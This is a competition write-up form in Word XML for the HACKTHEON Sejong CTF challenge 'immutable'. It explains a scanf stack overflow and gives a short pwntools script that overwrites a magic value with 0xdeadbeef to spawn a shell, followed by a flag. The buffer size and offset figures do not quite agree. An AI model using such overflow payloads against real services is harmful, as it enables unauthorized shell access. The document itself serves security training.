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17"/>
        <w:gridCol w:w="8239"/>
      </w:tblGrid>
      <w:tr w:rsidR="003A6786" w14:paraId="1B1F11F0" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="397"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1640" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4FE2D329" w14:textId="77777777" w:rsidR="003A6786" w:rsidRDefault="007377E5">
            <w:pPr>
              <w:jc w:val="distribute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팀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이름</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BCBA150" w14:textId="77777777" w:rsidR="003A6786" w:rsidRDefault="007377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Team</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8816" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5DF85699" w14:textId="083E9A93" w:rsidR="003A6786" w:rsidRDefault="001903E8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VSL_go0n</w:t>
            </w:r>
            <w:r w:rsidR="007377E5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A6786" w14:paraId="1642AE7F" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="397"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1640" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="11FFDC50" w14:textId="77777777" w:rsidR="003A6786" w:rsidRDefault="007377E5">
            <w:pPr>
              <w:jc w:val="distribute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이름</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FB39E6A" w14:textId="77777777" w:rsidR="003A6786" w:rsidRDefault="007377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Question</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8816" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="48D10892" w14:textId="7528900F" w:rsidR="003A6786" w:rsidRDefault="004729D6">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:i/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:i/>
              </w:rPr>
              <w:t>immutable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A6786" w14:paraId="31E7A997" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="521"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="172CEF5E" w14:textId="77777777" w:rsidR="003A6786" w:rsidRDefault="007377E5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문제 풀이과정 작성 (캡처화면 필수) / Write-up Details (The screenshot is mandatory)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A6786" w14:paraId="6D211828" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="12372"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="4E480F44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>CTF Writeup: "How to change the immutable value?"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D7E8F60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</w:p>
          <w:p w14:paraId="3B4F3064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>Challenge Summary</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68002FFC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>- Category: Binary Exploitation (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004729D6">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>Pwn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004729D6">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A3DD792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>- Difficulty: Easy</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6183F3FF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>- Points: (varies)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E34766C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</w:p>
          <w:p w14:paraId="5DAFDF94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>Vulnerability</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F212282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>Stack-Based Buffer Overflow</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7535A4B9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</w:p>
          <w:p w14:paraId="25FD42B2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>The binary allocates a 144-byte buffer on the stack (sub $0x</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004729D6">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>90,%</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004729D6">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">rsp) and reads user input using </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004729D6">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>scanf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004729D6">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004729D6">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>"%s", buffer) without any length limit.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FF4794E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</w:p>
          <w:p w14:paraId="60DEB2F3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>Analysis</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A83F9CE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</w:p>
          <w:p w14:paraId="14133266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>// Vulnerable code (pseudo)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F812F5F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 xml:space="preserve">char </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004729D6">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>buffer[</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004729D6">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>144</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004729D6">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>];  /</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004729D6">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>/ 0x90 = 144 bytes</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A0331D1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proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004729D6">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>scanf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004729D6">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004729D6">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>"%s", buffer</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004729D6">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>);  /</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004729D6">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>/ No length check!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="479B04C1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</w:p>
          <w:p w14:paraId="2112342F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>// At offset 128, there exists a "magic" value</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5268C145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>// The program checks if this value == 0xdeadbeef</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17CB57E0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>if (value == 0xdeadbeef) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EF6DDC0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 xml:space="preserve">    system("/bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004729D6">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>sh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004729D6">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004729D6">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>);  /</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004729D6">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>/ Shell!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FA6037E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>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EE0AC3F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</w:p>
          <w:p w14:paraId="3C3CE4EC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</w:p>
          <w:p w14:paraId="07270B47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>Exploitation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FE85897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</w:p>
          <w:p w14:paraId="0F9B82BC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>The exploit is straightforward:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BF30CBC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>1. Fill the 128-byte buffer with any content (e.g., A characters)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="163C691B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>2. Overwrite the "immutable" value at offset 128 with 0xdeadbeef</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2698FE5C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>3. Trigger the shell</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5662E92F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</w:p>
          <w:p w14:paraId="2B98A125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 xml:space="preserve">from </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004729D6">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>pwn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004729D6">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> import *</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="196ABF97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</w:p>
          <w:p w14:paraId="2F44D1B5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># Connect to the service</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E2DDC06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lastRenderedPageBreak/>
              <w:t xml:space="preserve">p = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004729D6">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>remote(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004729D6">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>'target', port)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="405ED920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</w:p>
          <w:p w14:paraId="11BC7FB6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># 128 bytes of padding + 0xdeadbeef in little-endian</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="077C2FDA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 xml:space="preserve">payload = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004729D6">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>b'A</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004729D6">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>' * 128 + p64(0xdeadbeef)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="424483A7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</w:p>
          <w:p w14:paraId="597B861E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proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004729D6">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>p.sendline</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004729D6">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>(payload)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72D50EAD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proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004729D6">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>p.interactive</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004729D6">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>()  #</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004729D6">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> Get shell!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72A1049F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</w:p>
          <w:p w14:paraId="263B38AE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</w:p>
          <w:p w14:paraId="48FA3ADC" w14:textId="77777777" w:rsidR="004729D6" w:rsidRPr="004729D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>Flag</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F61C16D" w14:textId="42B0E6FC" w:rsidR="003A6786" w:rsidRDefault="004729D6" w:rsidP="004729D6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004729D6">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>hacktheon2026{d125e35df65ae46728de20a0ee8eadaf247c75092cc79b60a5b077407f01ce98d54ce454e2ff07d2da7f72a8b5d7c5768c49867d9e73893c3b0510450a19659176491d9554d97c3f}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04463596" w14:textId="77777777" w:rsidR="003A6786" w:rsidRDefault="003A6786">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="14827DCF" w14:textId="77777777" w:rsidR="003A6786" w:rsidRDefault="003A6786">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="29A8ABF2" w14:textId="77777777" w:rsidR="003A6786" w:rsidRDefault="003A6786" w:rsidP="00AA500F">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="003A6786">
      <w:headerReference w:type="default" r:id="rId6"/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2C532" w14:textId="77777777" w:rsidR="00027F61" w:rsidRDefault="00027F61">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1667E8CA" w14:textId="77777777" w:rsidR="00027F61" w:rsidRDefault="00027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A2E37" w14:textId="77777777" w:rsidR="00027F61" w:rsidRDefault="00027F61">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1A3A1BF1" w14:textId="77777777" w:rsidR="00027F61" w:rsidRDefault="00027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22699" w14:textId="77777777" w:rsidR="003A6786" w:rsidRDefault="007377E5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0" locked="0" layoutInCell="1" hidden="0" allowOverlap="0" wp14:anchorId="1674E502" wp14:editId="1D823C8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6350" t="6350" r="6350" b="6350"/>
              <wp:wrapSquare wrapText="bothSides"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622C85"/>
                      </a:solidFill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DAE000"/>
                              <w:sz w:val="32"/>
                              <w:szCs w:val="44"/>
                            </w:rPr>
                            <w:alias w:val="제목"/>
                            <w:id w:val="-1"/>
                            <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties'" w:xpath="/ns1:coreProperties[1]/ns0:title[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
                            <w15:color w:val="DAE000"/>
                            <w:text/>
                          </w:sdtPr>
                          <w:sdtContent>
                            <w:p w14:paraId="28587609" w14:textId="648876D9" w:rsidR="003A6786" w:rsidRDefault="001903E8">
                              <w:pPr>
                                <w:pStyle w:val="Header"/>
                                <w:jc w:val="center"/>
                                <w:rPr>
                                  <w:b/>
                                  <w:bCs/>
                                  <w:caps/>
                                  <w:color w:val="DAE000"/>
                                  <w:sz w:val="32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DAE000"/>
                                  <w:sz w:val="32"/>
                                  <w:szCs w:val="44"/>
                                </w:rPr>
                                <w:t>2025 HACKTHEON SEJONG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ctr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674E502" id="shape2049" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:468.5pt;height:21.3pt;z-index:251659264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" o:allowoverlap="f" fillcolor="#622c85" strokecolor="#4472c4 [3204]" strokeweight="1pt">
              <v:path arrowok="t"/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DAE000"/>
                        <w:sz w:val="32"/>
                        <w:szCs w:val="44"/>
                      </w:rPr>
                      <w:alias w:val="제목"/>
                      <w:id w:val="-1"/>
                      <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties'" w:xpath="/ns1:coreProperties[1]/ns0:title[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
                      <w15:color w:val="DAE000"/>
                      <w:text/>
                    </w:sdtPr>
                    <w:sdtContent>
                      <w:p w14:paraId="28587609" w14:textId="648876D9" w:rsidR="003A6786" w:rsidRDefault="001903E8">
                        <w:pPr>
                          <w:pStyle w:val="Header"/>
                          <w:jc w:val="center"/>
                          <w:rPr>
                            <w:b/>
                            <w:bCs/>
                            <w:caps/>
                            <w:color w:val="DAE000"/>
                            <w:sz w:val="32"/>
                            <w:szCs w:val="44"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:bCs/>
                            <w:caps/>
                            <w:color w:val="DAE000"/>
                            <w:sz w:val="32"/>
                            <w:szCs w:val="44"/>
                          </w:rPr>
                          <w:t>2025 HACKTHEON SEJONG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786"/>
    <w:rsid w:val="00027F61"/>
    <w:rsid w:val="000F4204"/>
    <w:rsid w:val="001903E8"/>
    <w:rsid w:val="001E3E21"/>
    <w:rsid w:val="00285331"/>
    <w:rsid w:val="003142CF"/>
    <w:rsid w:val="003A6786"/>
    <w:rsid w:val="004729D6"/>
    <w:rsid w:val="006D1DC6"/>
    <w:rsid w:val="007377E5"/>
    <w:rsid w:val="00AA500F"/>
    <w:rsid w:val="00FC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AF290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2025 HACKTHEON SEJONG</vt:lpstr>
    </vt:vector>
  </TitlesOfParts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 HACKTHEON SEJONG</dc:title>
  <dc:subject/>
  <dc:creator/>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy/>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-04-23T12:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-25T02:29:00Z</dcterms:modified>
  <cp:version>1100.0100.01</cp:version>
</cp:coreProperties>
</file>